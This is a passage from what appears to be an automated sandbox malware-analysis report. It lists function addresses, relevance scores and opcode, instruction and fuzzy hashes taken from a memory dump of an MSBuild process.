                        • Instruction Fuzzy Hash: FDB132B1E1020ACFDB14CFA9C88579DBBF2BF88314F148229E515EB354EB749856CB91
                        Function 01239158 Relevance: .3, Instructions: 266COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0024cb56fdcc82db7d191de2221324bd1bb885a84c51a2515a4d9d00ee23eb34
                        • Instruction ID: 1bb8b82fe564ea287368aedc7d946339fe75eb0ee02a3e4964317b0fc102e3ac
                        • Opcode Fuzzy Hash: 0024cb56fdcc82db7d191de2221324bd1bb885a84c51a2515a4d9d00ee23eb34
                        • Instruction Fuzzy Hash: 45B15EB0E106098FDF14CFA9D8817DEBBF2BF89318F148129D515E7294EBB49885CB81

                        Non-executed Functions

                        Function 0123CA90 Relevance: 1.0, Instructions: 1021COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c40ec566bc9039be5ed99beab4e11a4f0498d65ded5557bfbff6e2b011600611
                        • Instruction ID: ba5fffea78f81d509aca6b1b4d6f13cdc6af5e07e2d19f9d561d84af898b3530
                        • Opcode Fuzzy Hash: c40ec566bc9039be5ed99beab4e11a4f0498d65ded5557bfbff6e2b011600611
                        • Instruction Fuzzy Hash: BA827C707007058FDB18DF69D895B2EB7E2BFC8300F64856DE5068B3A6DA75DD068B81
                        Function 012332F7 Relevance: .3, Instructions: 317COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e860c0a3c1c752fb6084290bc1fee3c0de7ce8798c60ea908d994c1e41506a2f
                        • Instruction ID: 37b7de2aa01038ef9272277538a46481ab1964322470155d1f3d2f5844fbbbc9
                        • Opcode Fuzzy Hash: e860c0a3c1c752fb6084290bc1fee3c0de7ce8798c60ea908d994c1e41506a2f
                        • Instruction Fuzzy Hash: B89192B2F243164BDB09C9AE8D913AE65D37FC4215F4D8139DA02CF785EEB4DA065B40
                        Function 01238540 Relevance: .2, Instructions: 238COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000004.00000002.2388009188.0000000001230000.00000040.00000800.00020000.00000000.sdmp, Offset: 01230000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_1230000_MSBuild.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1359455e06bea7d1a929d86fde11687fc6469bb39bba956d179595466723e95a
                        • Instruction ID: 1b2300557f1d213fa641852b7e5d1777adb0e3b1435671f0b7b4c90ffd8007f2
                        • Opcode Fuzzy Hash: 1359455e06bea7d1a929d86fde11687fc6469bb39bba956d179595466723e95a
                        • Instruction Fuzzy Hash: AF9161B1E10309CFDB14CFA9D98179DBBF2BF88314F148229E515AB294EB749846CB81